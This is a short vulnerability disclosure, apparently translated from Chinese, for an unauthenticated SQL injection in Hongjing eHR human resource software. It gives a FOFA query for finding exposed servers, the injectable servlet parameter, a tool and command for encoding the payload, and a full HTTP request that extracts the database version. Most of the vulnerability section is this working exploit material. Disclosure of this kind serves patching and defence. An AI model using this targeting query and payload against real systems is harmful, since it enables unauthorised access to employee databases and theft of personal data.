0x01 Product Introduction
Hongjing eHR human resource management software is a software that integrates human resource management and digital applications to meet the needs of dynamic, collaborative, process-oriented, and strategic.
0x02 Vulnerability Overview
There is a SQL injection vulnerability in Hongjing eHR. Unauthenticated remote attackers can use this vulnerability to execute arbitrary SQL commands, thereby stealing sensitive database information.
0x03 range of influence
Hongjing eHR < 8.2
0x04 Recurrence environment
FOFA:body='<div class="hj-hy-all-one-logo"'
0x05 Vulnerability Reappearance
PoC (the injection point is the categories field)
/servlet/codesettree?categories=[加密后的恶意sql]&codesetid=1&flag=c&parentid=-1&status=1
Note: Here you need to encode the sql statement in hrms
Tool address: https://github.com/vaycore/HrmsTool
java -jar HrmsTool.jar -e "1' union all select 'hongjing',@@version--"
Construct payload (query database version)
GET /servlet/codesettree?categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d&codesetid=1&flag=c&parentid=-1&status=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Reproduced successfully
0x06 Repair suggestion
At present, the software has released a security repair update, and affected users can contact the manufacturer to obtain the patch.